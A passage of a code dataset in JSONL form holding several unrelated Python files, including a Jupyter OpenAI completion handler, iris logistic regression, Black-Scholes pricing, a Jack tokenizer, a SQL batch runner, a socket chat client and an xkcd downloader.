\"\"\"\n)\n","repo_name":"sesame-app/sesame-python-client","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36061427680","text":"from jupyter_server.base.handlers import APIHandler\nfrom jupyter_server.utils import url_path_join\nfrom tornado.escape import json_encode, json_decode\nimport tornado\nimport openai\n\nclass RouteHandler(APIHandler):\n # The following decorator should be present on all verb methods (head, get, post,\n # patch, put, delete, options) to ensure only authorized user can request the\n # Jupyter server\n @tornado.web.authenticated\n def post(self):\n if len(self.request.body) == 0:\n self.set_status(400)\n self.finish(json_encode({ \"message\": \"no body provided\" }))\n 
return\n\n data = json_decode(self.request.body)\n\n response = openai.Completion.create(\n api_key=data.get(\"api_key\"),\n engine=data.get(\"engine\", \"davinci-codex\"),\n prompt=data.get(\"prompt\", \"\"),\n max_tokens=data.get(\"max_tokens\", 256),\n temperature=data.get(\"temperature\", 0.5),\n stop=data.get(\"stop\", [\"####\"]),\n )\n\n self.finish(json_encode(response))\n\n\ndef setup_handlers(web_app):\n host_pattern = \".*$\"\n\n base_url = web_app.settings[\"base_url\"]\n route_pattern = url_path_join(base_url, \"jupyterlab-codex\", \"completion\")\n handlers = [(route_pattern, RouteHandler)]\n web_app.add_handlers(host_pattern, handlers)\n","repo_name":"lhr0909/jupyterlab-codex","sub_path":"jupyterlab_codex/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","stars":86,"dataset":"github-code","pt":"27"} +{"seq_id":"73875528712","text":"import os, sys\n\npath = [ \".\", \"..\", \"../..\", \"../../..\", \"../../../..\" ]\nhead = os.path.dirname(sys.argv[0])\nif len(head) > 0:\n path = [os.path.join(head, p) for p in path]\npath = [os.path.abspath(p) for p in path if os.path.exists(os.path.join(p, \"scripts\", \"TestUtil.py\")) ]\nif len(path) == 0:\n raise RuntimeError(\"can't find toplevel directory!\")\nsys.path.append(os.path.join(path[0], \"scripts\"))\nimport TestUtil\n\nrouter = TestUtil.getGlacier2Router()\n\nif TestUtil.appverifier:\n TestUtil.setAppVerifierSettings([router])\n\ndef startRouter():\n\n args = ' --Ice.Warn.Dispatch=0' + \\\n ' --Ice.Warn.Connections=0' + \\\n ' --Ice.ThreadPool.Server.Serialize=1' + \\\n ' --Ice.ThreadPool.Client.Serialize=1' + \\\n ' --Glacier2.Filter.Category.Accept=\"c\"' + \\\n ' --Glacier2.SessionTimeout=\"30\"' + \\\n ' --Glacier2.Client.Endpoints=\"default -p 12347\"' + \\\n ' --Glacier2.Server.Endpoints=\"tcp -h 127.0.0.1\"' \\\n ' --Ice.Admin.Endpoints=\"tcp -h 127.0.0.1 -p 12348\"' + \\\n ' --Glacier2.PermissionsVerifier=Glacier2/NullPermissionsVerifier' + \\\n ' --Glacier2.Client.ForwardContext=1' + \\\n ' --Glacier2.Client.Trace.Override=0' + \\\n ' --Glacier2.Client.Trace.Request=0' + \\\n ' --Glacier2.Server.Trace.Override=0' + \\\n ' --Glacier2.Server.Trace.Request=0' + \\\n ' --Ice.Admin.InstanceName=\"Glacier2\"' + \\\n ' --Glacier2.Client.Buffered=1 --Glacier2.Server.Buffered=1' + \\\n ' --Glacier2.Client.SleepTime=50 --Glacier2.Server.SleepTime=50'\n\n sys.stdout.write(\"starting router in buffered mode... 
\")\n sys.stdout.flush()\n starterProc = TestUtil.startServer(router, args, count=2)\n print(\"ok\")\n return starterProc\n\nname = os.path.join(\"Glacier2\", \"override\")\n\nstarterProc = startRouter()\nTestUtil.clientServerTest(name, additionalClientOptions = \" --shutdown\")\nstarterProc.waitTestSuccess()\n\nif TestUtil.appverifier:\n TestUtil.appVerifierAfterTestEnd([router])\n","repo_name":"hwz121212/zeroc_ice","sub_path":"Ice-3.5.1/demo/test/Glacier2/override/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"34705352955","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import datasets\nfrom sklearn.linear_model import LogisticRegression\nimport math\nimport matplotlib.colors as colors\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom mpl_toolkits import mplot3d\nfrom sklearn import linear_model, datasets\nimport seaborn as sns\nimport itertools\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd\nfrom time import time\nfrom mlxtend.data import iris_data\nfrom mlxtend.plotting import plot_decision_regions\nimport matplotlib.pyplot as plt\n\n\n\niris = pd.read_csv('iris.csv')\n\n\nX_data = iris.iloc[:,2:4].values\nY = iris.iloc[:,4].values\nprint(Y.shape)\n\n\n\n\nX0 = np.ones((150,1))\nX = np.append(X_data, X0, axis=1)\n\n\n\na = np.array(X[0:40,:])\nb = np.array(X[50:90,:])\nc = np.array(X[100:140,:])\narray_tuple = (a, b, c)\nX_training = np.vstack(array_tuple)\n\na2 = np.array(Y[0:40])\nb2 = np.array(Y[50:90])\nc2 = np.array(Y[100:140])\narray_tuple2 = (a2, b2, c2)\nY_training = np.vstack(array_tuple2)\n\nd = np.array(X[40:50,:])\ne = np.array(X[90:100,:])\nf = np.array(X[140:150,:])\narray_tuple5 = (d, e, f)\nX_test = np.vstack(array_tuple5)\n\nd2 = np.array(Y[40:50])\ne2 = np.array(Y[90:100])\nf2 = np.array(Y[140:150])\narray_tuple6 = (d2, e2, f2)\nY_test = np.vstack(array_tuple6)\n\n\nt1 = np.append(np.ones((40,1)),np.zeros((80,1)))\nt21 = np.append(np.zeros((40,1)),np.ones((40,1)))\nt2 = np.append(t21,np.zeros((40,1)))\nt3 = np.append(np.zeros((80,1)),np.ones((40,1)))\nprint (t1.shape)\n\n\nT_0 = (t1,t2,t3)\nT = np.column_stack((T_0))\nprint(T.shape)\n\n\n\nW1 = np.zeros((2,1))\nW2 = np.zeros((2,1))\nW3 = np.zeros((2,1))\nb = np.zeros((1,3))\nprint(b)\nWt = np.column_stack(((W1,W2,W3)))\nprint(Wt)\nprint(X_training.shape)\nprint(Wt.shape)\nprint(Wt)\n\n\n\nW = np.row_stack((Wt,b))\nalphaMax = 300\n\n\nclass MultiNumialRegression:\n \n def __init__(self, N_iteration = 8000, thres = 1e-3):\n self.N_iteration = N_iteration\n self.thres = thres\n \n def FittingModel(self, X,Y, batch_size = 32, learningrate = 0.001, random_seed = 4, verbose =False):\n np.random.seed(random_seed)\n self.classes = np.unique(Y)\n self.class_labels = {c:i for i,c in enumerate(self.classes)}\n X = self.Bias(X)\n Y = self.One_Hot_Encoding(Y)\n self.loss = []\n self.weights = np.zeros(shape=(len(self.classes),X.shape[1]))\n self.FittingData(X, Y, batch_size, learningrate, verbose)\n return self\n \n def FittingData(self, X,Y, batch_size, learningrate, verbose):\n i = 0\n while (not self.N_iteration or i < self.N_iteration):\n self.loss.append(self.CrossEntropy(Y, self.Predict1(X)))\n \n idx = np.random.choice(X.shape[0], batch_size)\n \n X_B, Y_B = X[idx], Y[idx]\n error = Y_B - self.Predict1(X_B)\n \n update = (learningrate * np.dot(error.T, X_B))\n self.weights += update\n \n if 
np.abs(update).max() < self.thres: break\n            if i % 1000 == 0 and verbose: \n                print(' Training accuracy at {} iteration is {}'.format(i, self.Evaluation(X, Y)))\n            i +=1\n    \n    def RandomWeights(self, row, col):\n        return np.zeros(shape=(row,col))\n    \n    \n    def Predict1(self,X):\n        value = np.dot(X, self.weights.T).reshape(-1,len(self.classes))\n        return self.softmax(value)\n    \n    def Prediction(self, X):\n        return self.Predict1(self.Bias(X))\n    \n    def PredictClasses(self, X):\n        self.probability = self.Prediction(X)\n        a = np.vectorize(lambda c: self.classes[c])(np.argmax(self.probability, axis=1))\n        return a\n    \n    def softmax(self, v):\n        s = np.exp(v)/ np.sum(np.exp(v),axis=1).reshape(-1,1)\n        return s\n    \n    def Bias(self,X):\n        return np.insert(X, 0, 1, axis=1) #add 1 to the columns\n    \n    def One_Hot_Encoding(self, Y):\n        return np.eye(len(self.classes))[np.vectorize(lambda c: self.class_labels[c])(Y).reshape(-1)]\n    \n    \n    def Score(self, X, Y):\n        return np.mean(self.PredictClasses(X) == Y)\n    \n    def CrossEntropy(self, Y, probability):\n        return -1 * np.mean(Y * np.log(probability))\n    \n    def Evaluation(self, X, Y):\n        return np.mean(np.argmax(self.Predict1(X), axis=1) == np.argmax(Y, axis=1))\n    \n\n\nX,Y = datasets.load_iris(return_X_y=True)\nMNR = MultiNumialRegression()\n\nMNR.FittingModel(X,Y,learningrate=0.001)\nprint(MNR.Score(X, Y))\nplot_CE = plt.figure(figsize=(12,8))\nplt.plot(np.arange(len(MNR.loss)),MNR.loss)\nplt.title(\" Cross Entropy during training\")\nplt.xlabel(\"Number of iterations\")\nplt.ylabel(\"Cross Entropy\")\nplt.show()\n\n\n\niris = datasets.load_iris()\nX = iris.data[:, 2:] # take petal features\nY = iris.target\nMNR = MultiNumialRegression()\n\n# create an instance of MNR and fit it to the data\nMNR.FittingModel(X,Y,learningrate=0.001)\n# Plot the decision boundary. \nx_min, x_max = X[:, 0].min() - .5, X[:, 0].max() + .5\ny_min, y_max = X[:, 1].min() - .5, X[:, 1].max() + .5\nMu = .02 # step size \nxx, yy = np.meshgrid(np.arange(x_min, x_max, Mu), np.arange(y_min, y_max, Mu))\nZ = MNR.PredictClasses(np.c_[xx.ravel(), yy.ravel()])\n# Put the result into a color plot\nZ = Z.reshape(xx.shape)\nplt.figure(1, figsize=(7, 5))\nplt.pcolormesh(xx, yy, Z, cmap=plt.cm.Paired)\n# Plot also the training points\nplt.scatter(X[:, 0], X[:, 1], c=Y, edgecolors='k', cmap=plt.cm.Paired)\nplt.xlabel('Petal Length')\nplt.ylabel('Petal Width')\nplt.xlim(xx.min(), xx.max())\nplt.ylim(yy.min(), yy.max())\nplt.xticks(())\nplt.yticks(())\nplt.show()\n\n\n\n# In the code below we have some parameters:\n# learningrate is our learning rate, between 0.0 and 1.0\n# epochs (default: 50): passes over the training dataset.\n# l2: regularization parameter for L2 regularization. 
No regularization is applied if l2=0.0.\n# random_seed (default: None): sets the random state for shuffling and initializing the weights.\n# The function one_hot_encoding returns a matrix in which each sample of y is represented as a row and each column represents a class label.\n\n\nclass MNR2(object):\n\n    def __init__(self, learningrate=0.001, epochs=50, l2_regula=0.0, batches=1, n_classes=None, random_seed=None):\n\n        self.learningrate = learningrate\n        self.epochs = epochs\n        self.l2_regula = l2_regula\n        self.batches = batches\n        self.n_classes = n_classes\n        self.random_seed = random_seed\n\n    def fiting(self, X, y, parameters=True):\n        if parameters:\n            if self.n_classes is None:\n                self.n_classes = np.max(y) + 1\n            self.n_features = X.shape[1]\n            self.b, self.w = self.init_parameters(\n                weights_shape=(self.n_features, self.n_classes),\n                bias_shape=(self.n_classes,),\n                random_seed=self.random_seed)\n            self.cost_ = []\n\n        y_encoding = self.one_hot_encoding(y = y, n_labels=self.n_classes, dtype=float)\n\n        for i in range(self.epochs):\n            for idx in self.yield_batches_idx(\n                    n_batches=self.batches,\n                    data_array=y,\n                    shuffle=True):\n                # the weight matrix is (number of features x number of classes); the bias has one entry per class\n                \n                net = self.Input(X[idx], self.w, self.b)\n                softmax = self.Softmax(net)\n                differential = softmax - y_encoding[idx]\n                mse = np.mean(differential, axis=0)\n                gradient = np.dot(X[idx].T, differential)\n                \n                self.w -= (self.learningrate * gradient +\n                           self.learningrate * self.l2_regula * self.w)\n                self.b -= (self.learningrate * np.sum(differential, axis=0))\n\n            # compute the cost\n            net = self.Input(X, self.w, self.b)\n            softmax = self.Softmax(net)\n            cross_entropy = self.Cross_entropy(output=softmax, y_target=y_encoding)\n            cost = self.Cost(cross_entropy)\n            self.cost_.append(cost)\n        return self\n\n    def Fit_Data(self, X, y, parameters=True):\n\n        if self.random_seed is not None:\n            np.random.seed(self.random_seed)\n        self.fiting(X=X, y=y, parameters=parameters)\n        self.fitted = True\n        return self\n    \n    \n    def _predict(self, X):\n        probability = self.predicted_probability(X)\n        return self.to_classlabels(probability)\n    \n    def predict(self, X):\n        if not self.fitted:\n            raise AttributeError('The Model is not fit!')\n        return self._predict(X)\n\n    def predicted_probability(self, X):\n        \n        net = self.Input(X, self.w, self.b)\n        softmax = self.Softmax(net)\n        return softmax\n\n    def Input(self, X, W, b):\n        return (X.dot(W) + b)\n\n    def Softmax(self, z):\n        return (np.exp(z.T) / np.sum(np.exp(z), axis=1)).T\n\n    def Cross_entropy(self, output, y_target):\n        return - np.sum(np.log(output) * (y_target), axis=1)\n\n    def Cost(self, cross_entropy):\n        L2_term = self.l2_regula * np.sum(self.w ** 2)\n        cross_entropy = cross_entropy + L2_term\n        return 0.5 * np.mean(cross_entropy)\n\n    def to_classlabels(self, z):\n        return z.argmax(axis=1)\n    \n    def init_parameters(self, weights_shape, bias_shape=(1,), dtype='float64',\n                        scale=0.01, random_seed=None):\n        \n        if random_seed:\n            np.random.seed(random_seed)\n        w = np.random.normal(loc=0.0, scale=scale, size=weights_shape)\n        b = np.zeros(shape=bias_shape)\n        return b.astype(dtype), w.astype(dtype)\n    \n    def one_hot_encoding(self, y, n_labels, dtype):\n        \n        oneh = np.zeros((len(y), n_labels))\n        for i, val in enumerate(y):\n            oneh[i, val] = 1\n        return oneh.astype(dtype) \n    \n    def yield_batches_idx(self, n_batches, data_array, shuffle=True):\n        indices = np.arange(data_array.shape[0])\n        if shuffle:\n            indices = np.random.permutation(indices)\n        if n_batches > 1:\n            remainder = data_array.shape[0] % n_batches\n            if 
remainder:\n                minis = np.array_split(indices[:-remainder], n_batches)\n                minis[-1] = np.concatenate((minis[-1],\n                                            indices[-remainder:]),\n                                           axis=0)\n            else:\n                minis = np.array_split(indices, n_batches)\n\n        else:\n            minis = (indices,)\n\n        for idx_batch in minis:\n            yield idx_batch\n    \n    def shuffle_arrays(self, arrays):\n        \n        sh = np.random.permutation(len(arrays[0]))\n        return [ary[sh] for ary in arrays]\n\nX, y = iris_data()\n#Petal length and petal width\nX = X[:, 2 : ] \n# standardize\nX[:,0] = (X[:,0] - X[:,0].mean()) / X[:,0].std()\nX[:,1] = (X[:,1] - X[:,1].mean()) / X[:,1].std()\nMNR_S = MNR2(learningrate=0.01, epochs=10, batches=1, random_seed=0)\nMNR_S.Fit_Data(X, y)\nplot_decision_regions(X, y, clf=MNR_S)\nplt.title('MNR by considering GD')\nplt.show()\nplt.plot(range(len(MNR_S.cost_)), MNR_S.cost_)\nplt.xlabel('Iterations')\nplt.ylabel('Cost')\nplt.show()\n\n\n\n# Continue training for another 500 epochs with parameters=False\n\n\n\nMNR_S.epochs = 500\nMNR_S.Fit_Data(X, y, parameters=False)\n\nplot_decision_regions(X, y, clf=MNR_S)\nplt.title('MNR by considering SGD')\nplt.show()\nplt.plot(range(len(MNR_S.cost_)), MNR_S.cost_)\nplt.xlabel('Iterations')\nplt.ylabel('Cost')\nplt.show()\n\n\n\ny_predicted = MNR_S.predict(X)\ny_pred = MNR_S.predicted_probability(X)\nprint('Last 3 Class Labels: %s' % y_predicted[-3:])\nprint('Last 3 Class Probabilities:\\n %s' % y_pred[-3:])\n\n\n\n\n\n\n","repo_name":"NedaKeivan/Pattern-Recognition-MNR-","sub_path":"MNR-ICP_pythonCode.py","file_name":"MNR-ICP_pythonCode.py","file_ext":"py","file_size_in_byte":11663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"14932257862","text":"\"\"\"\nPythonista3 app to learn WebGL\n\"\"\"\n\nimport wk.wkwebview as wkwebview\nimport ui\nimport pathlib\n\nuri = pathlib.Path('./index.html')\n\n\nclass View(ui.View):\n    def __init__(self):\n        self.wv = wkwebview.WKWebView(flex='WH')\n        self.wv.load_url(str(uri))\n        self.add_subview(self.wv)\n\n    def will_close(self):\n        self.wv.clear_cache()\n\n\n_view = View()\n_view.present(style='fullscreen', orientations=['portrait'])\n\n","repo_name":"pome-ta/webgl_learning-Pythonista","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"37713133593","text":"import numpy as np\nimport pandas as pd\nimport pyarrow as pa\n\nfrom parquery.transport import (\n    serialize_df,\n    deserialize_df,\n    serialize_pa_table,\n    deserialize_pa_table\n)\n\ndef test_pa_serialization():\n    iterable = ((x, x) for x in range(20000))\n    data = np.fromiter(iterable, dtype='i8,i8')\n    df = pd.DataFrame(data)\n\n    data_table = pa.Table.from_pandas(df, preserve_index=False)\n    buf = serialize_pa_table(data_table)\n    data_table_2 = deserialize_pa_table(buf)\n\n    assert data_table == data_table_2\n\n\ndef test_serialization():\n    df = pd.DataFrame({'A': [1, 2], 'B': [3, 4]})\n\n    parquery_encoded = serialize_df(df)\n    assert isinstance(parquery_encoded, pa.Buffer)\n\n    deserialized_parquery_df = deserialize_df(parquery_encoded)\n    assert df.to_dict() == deserialized_parquery_df.to_dict()\n","repo_name":"visualfabriq/parquery","sub_path":"tests/test_serialization.py","file_name":"test_serialization.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"2467518785","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jul 
27 14:12:33 2019\r\n\r\n@author: admin\r\n\"\"\"\r\n\r\nfrom math import log,sqrt,exp\r\nfrom scipy import stats\r\nfrom random import gauss,seed\r\nfrom time import time\r\n\r\ndef bs_call_value(S0,K,T,r,sigma):\r\n    s0 = float(S0)\r\n    d1 = (log(s0/K) + (r + sigma*sigma*0.5)*T)/(sigma*sqrt(T))\r\n    d2 = (log(s0/K) + (r - sigma*sigma*0.5)*T)/(sigma*sqrt(T))\r\n    value = s0 * stats.norm.cdf(d1,0.0,1.0) - K * exp(-r*T)*stats.norm.cdf(d2,0.0,1)\r\n    return value\r\n\r\ndef bs_vega(S0,K,T,r,sigma):\r\n    s0 = float(S0)\r\n    d1 = ((log(s0/K) + (r + 0.5*sigma*sigma)*T))/(sigma*sqrt(T))\r\n    vega = s0 * stats.norm.pdf(d1,0.0,1.0)*sqrt(T)  # vega uses the standard normal pdf, not the cdf\r\n    return vega\r\n\r\ndef bs_call_imp_vol(S0,K,T,r,C0,sigma_est,it=100):\r\n    '''Implied volatility of European call option in BS model.\r\n    Parameters\r\n    =============\r\n    S0 : float\r\n        initial stock/index level\r\n    K : float\r\n        Strike price\r\n    T : float\r\n        maturity date (in year fractions)\r\n    r : float \r\n        constant risk-free short rate\r\n    sigma_est : float\r\n        estimate of implied volatility\r\n    it : integer\r\n        number of iterations\r\n    \r\n    Returns\r\n    ==============\r\n    sigma_est : float\r\n        numerically estimated implied volatility\r\n    '''\r\n    \r\n    for i in range(it):\r\n        sigma_est -= ((bs_call_value(S0,K,T,r,sigma_est) - C0) / bs_vega(S0,K,T,r,sigma_est))\r\n    return sigma_est\r\n\r\ndef monte_carlo_valuation():\r\n    seed(20000)\r\n    t0 = time()\r\n    \r\n    S0 = 2.982\r\n    K = 2.7\r\n    T = 0.08333\r\n    r = 0.03\r\n    sigma = 0.1374\r\n    M = 50\r\n    dt = T/M\r\n    I = 250000\r\n    S = []\r\n    \r\n    for i in range(I):\r\n        path = []\r\n        for t in range(M + 1):\r\n            if t == 0:\r\n                path.append(S0)\r\n            else:\r\n                z = gauss(0.0,1.0)\r\n                St = path[t - 1] * exp((r - 0.5*sigma*sigma) * dt + sigma *sqrt(dt) *z)\r\n                path.append(St)\r\n        S.append(path)\r\n    \r\n    C0 = exp(-r*T)*sum([max(path[-1] - K,0) for path in S]) / I\r\n    tpy = time() - t0\r\n    print( \"European Option Value %7.3f\" % C0)\r\n    print(\"Duration in Seconds %7.3f\" % tpy)\r\n    \r\n\r\nif __name__ == '__main__':\r\n    print(\"bs option function : \" + str(bs_call_value(2.982,2.7,0.083333,0.03,0.1374)))\r\n    monte_carlo_valuation()","repo_name":"whut-aaron/python-scripts","sub_path":"bs_option.py","file_name":"bs_option.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42363524712","text":"#!/usr/bin/env python3\n\nfrom functools import reduce\n\nKEYWORD = 0\nSYMBOL = 1\nIDENTIFIER = 2\nINT_CONST = 3\nSTRING_CONST = 4\n\nKEYWORDS = ('class', 'constructor', 'function', 'method', 'field',\n        'static', 'var', 'int', 'char', 'boolean', 'void', 'true', 'false',\n        'null', 'this', 'let', 'do', 'if', 'else', 'while', 'return')\nSYMBOLS = ('{', '}', '(', ')', '[', ']', '.', ',', ';', '+',\n        '-', '*', '/', '&', '|', '<', '>', '=', '~')\n\nclass JackTokenizer(object):\n    \"\"\" JackTokenizer removes all comments and white space from the input\n    stream and breaks it into Jack language tokens, as specified by the Jack\n    grammar.\n    \"\"\"\n\n    _dec_file_ptr = lambda self, num: self.file.seek(self.file.tell()-num)\n\n    def __init__(self, file):\n        \"\"\" is doc really needed? 
pff \"\"\"\n self.file = file\n \n def _group_until(self, identifier):\n \"\"\" \n # skips the file characters until identifier is found\n # returns the whole thing\n # returns False if EOF reached\n \"\"\"\n\n stretch = ''\n char = self.file.read(len(identifier))\n while char: # while not EOF\n if char == identifier:\n stretch += char\n return stretch\n stretch += char[0]\n self._dec_file_ptr(len(identifier)-1)\n char = self.file.read(len(identifier))\n return False\n\n def _group_until_logic(self, function, size=1):\n \"\"\"\n # groups the file characters until function(chars) is true\n # another version of _group_until using a function\n # returns False if EOF reached\n \"\"\"\n\n stretch = ''\n char = self.file.read(size)\n while char: # while not EOF\n if function(char):\n self._dec_file_ptr(size)\n return stretch\n stretch += char[0]\n self._dec_file_ptr(size-1)\n char = self.file.read(size)\n return False\n\n def hasMoreTokens(self):\n \"\"\" Do we have more tokens in the input? \"\"\"\n \n saved_pointer = self.file.tell() \n while True:\n char = self.file.read(1)\n if not char:\n return False # EOF reached\n if char.isspace():\n continue\n if char == '/':\n char2 = self.file.read(1)\n if char2 in ('*','/'): # comments ahead\n if char2 == '*':\n # loop until '*/'\n self._group_until('*/')\n elif char2 == '/':\n # loop until '\\n'\n self._group_until('\\n')\n continue\n self.file.seek(saved_pointer)\n return True\n\n def advance(self):\n \"\"\" Gets the next token from the input and makes it the current token.\n This method should only be called if hasMoreTokens() is true. Initially\n there is no current token.\n The whole program advancing logic will be built upon the file buffer\n pointers. (self.file.tell() and self.file.seek(int ptr))\n \"\"\"\n \n while True:\n c = self.file.read(1)\n \n if not c:\n return False # EOF reached\n if c.isspace():\n continue # skip space-like characters\n elif c == '/':\n c2 = self.file.read(1)\n if c2 in ('*','/'): # comment found\n self._dec_file_ptr(2)\n if c2 == '*':\n comment = self._group_until('*/')\n elif c2 == '/':\n comment = self._group_until('\\n')\n print(\"comment: %s\" % comment.strip())\n continue\n self._dec_file_ptr(1) # no comments, put c2 back into buffer\n \n # if character pass over this point, is part of valid token\n if c == '\"': # start of a string constant\n token = '\"'+self._group_until('\"')\n elif c.isdigit(): # start of a number\n self._dec_file_ptr(1)\n token = self._group_until_logic(lambda c: not c.isdigit())\n elif c.isalpha(): # start of a keyword\n self._dec_file_ptr(1)\n token = self._group_until_logic(lambda char: not char.isalpha())\n else: # single length token\n token = c\n\n self.current_token = token\n self._setTokenType()\n return self.current_token\n raise Exception(\"no tokens left\")\n\n\n def _setTokenType(self):\n \"\"\" Returns the type of the current token.\n may return:\n KEYWORD, \n SYMBOL, \n IDENTIFIER, \n INT_CONST, \n STRING_CONST,\n \"\"\"\n\n checkType = {\n KEYWORD: lambda token: token in KEYWORDS,\n SYMBOL: lambda token: token in SYMBOLS,\n INT_CONST: lambda token: token.isalnum(),\n STRING_CONST: lambda token: token[0]+token[-1] == '\"\"',\n IDENTIFIER: lambda token: token not in KEYWORDS and not\n token[0].isdigit() and reduce(lambda x, y: x and y,\n map(lambda c: c.isdigit() or c.isalpha() or (c is '_'),\n token))\n }\n\n for token_type in checkType:\n if checkType[token_type](self.current_token):\n self.token_type = token_type\n return self.token_type\n raise Exception(\"no types 
matched.\", self.current_token)\n return False\n\n\n","repo_name":"felipap/teocs","sub_path":"projects/chap11/jacktokenizer.py","file_name":"jacktokenizer.py","file_ext":"py","file_size_in_byte":5631,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"13607884886","text":"__author__ = 'v-rewei'\n\nimport DAO.SqlServerDAO\nimport datetime\n\nclass BatchRunSqlDAO:\n def RunBatch(self, slist, sql, who):\n if not sql or not slist or len(slist) == 0 or str(sql).strip == '':\n return \"Parameters Null Exception\"\n else:\n sql = str(sql).strip()\n self.LogBatchStart(who, sql)\n extmsg = ''\n for s in slist:\n self.LogSqlStart(s)\n dao = DAO.SqlServerDAO.SqlServerDAO(s)\n c = None\n try:\n dao.connect()\n c = dao.conn.cursor()\n c.execute(sql)\n dao.conn.commit()\n extmsg += s + \" :Success\\n\"\n except Exception as ext:\n extmsg += s + \" :Fail\\n Exception Message:\" + ext.message\n self.LogException(ext.message)\n break\n finally:\n if c:\n c.close()\n if dao:\n dao.closeconnect()\n self.LogBatchEnd()\n return extmsg\n\n def LogBatchStart(self, who, sql):\n with open(\"batchlog.log\", mode='a+') as f:\n f.write('\\n')\n s = self.FormatSplteline()\n f.write(s)\n f.write('\\n')\n f.write('Batch Start')\n f.write('\\n')\n f.write('Alias: ' + who)\n f.write('\\n')\n f.write(str(sql).replace('\\r\\n', '\\n'))\n f.write('\\n')\n\n def LogSqlStart(self, connstr):\n with open(\"batchlog.log\", mode='a+') as f:\n f.write('\\n')\n f.write(connstr)\n\n def LogException(self, message):\n with open(\"batchlog.log\", mode='a+') as f:\n f.write('\\n')\n f.write('Exception: \\n');\n f.write(message.replace('\\r\\n', '\\n'))\n\n def LogBatchEnd(self):\n with open(\"batchlog.log\", mode='a+') as f:\n f.write('\\n');\n f.write('Batch End')\n f.write('\\n')\n s = self.FormatSplteline()\n f.write(s)\n f.write('\\n')\n f.write('\\n')\n f.write('\\n')\n\n def FormatSplteline(self):\n s = ''.join(['=']*40)\n s += datetime.datetime.strftime(datetime.datetime.now(), '%Y-%m-%d %H:%M:%S')\n s += ''.join(['=']*40)\n return s\n","repo_name":"rav009/Data-Vertifier","sub_path":"Data Vertifier/DAO/BatchRunSqlDAO.py","file_name":"BatchRunSqlDAO.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"20472119185","text":"#!/usr/bin/env python3\nimport socket\n\ns=socket.socket()\nhost='192.168.56.1'\nport=int(input(\"Enter the PORT:\"))\n\ns.connect((host,port))\nwhile True:\n\tdata =str(s.recv(1024)).strip('b').strip('\\'')\n\tprint(data)\n\tmsg=bytes(\"reciever >>> \"+input(r\"\"),encoding='utf-8')\n\ts.send(msg)\n","repo_name":"vishnusoni2780/C-S-Box-Python-Project","sub_path":"rchat.py","file_name":"rchat.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"12885211009","text":"from imgtools.svg import Svg\nfrom argparse import ArgumentParser\n\n\ndef main():\n args = get_args()\n svgs = [Svg(f) for f in args.images]\n desired_size = min([i.__dict__[args.dimension] for i in svgs])\n if args.dimension == \"width\":\n [i.scale_width_to_reference(desired_size) for i in svgs]\n else:\n [i.scale_height_to_reference(desired_size) for i in svgs]\n save_all(svgs)\n\n\ndef save_all(svgs):\n for s in svgs:\n s.save(s.file.replace('.svg', '') + \"_resized\" + \".svg\")\n\n\ndef get_args():\n parser = ArgumentParser(description=\"Make svg images the same size in one 
dimension.\")\n general = parser.add_argument_group(title='General options')\n general.add_argument(\"-i\", \"--images\",\n help=\"images to change size of.\",\n nargs='+',\n metavar=\"files\",\n required=True)\n general.add_argument(\"-d\", \"--dimension\",\n choices=['width', 'height'],\n help=\"Which dimension to use.\",\n default='width')\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"wdecoster/combine_images","sub_path":"imgtools/same_size_svg.py","file_name":"same_size_svg.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"34585059030","text":"#! python3\n# downloadXkcd - downloads every XKCD comic\n\nimport logging, os, bs4, requests\n\nlogging.basicConfig(level=logging.DEBUG, format=' %(asctime)s - %(levelname)s - %(message)s')\n#logging.disable(logging.CRITICAL)\n\nurl = 'http://www.xkcd.com'\nos.makedirs('xkcd', exist_ok=True)\n\nwhile not url.endswith('#'):\n # download page\n print('Downloading page %s...' % url)\n res = requests.get(url)\n res.raise_for_status()\n\n soup = bs4.BeautifulSoup(res.text, 'html.parser')\n # find url of comic image\n comicElem = soup.select('#comic img')\n if comicElem is []:\n print('Could not find the image.')\n\n else:\n logging.debug(url)\n try:\n comicUrl = comicElem[0].get('src')\n comicUrl=\"http:\"+comicUrl\n if 'xkcd' not in comicUrl:\n comicUrl=comicUrl[:7]+'xkcd.com/'+comicUrl[7:]\n # download image\n print('Downloading image %s...' % comicUrl)\n res = requests.get(comicUrl)\n res.raise_for_status()\n\n except requests.exceptions.MissingSchema:\n prevLink = soup.select('a[rel=\"prev\"]')[0]\n url = 'http://xkcd.com' + prevLink.get('href')\n continue\n\n # save the image to ./xkcd\n imageFile = open(os.path.join('xkcd', os.path.basename(comicUrl)), 'wb')\n for chunk in res.iter_content(100000):\n imageFile.write(chunk)\n imageFile.close()\n\n # get the prev button url\n prevLink = 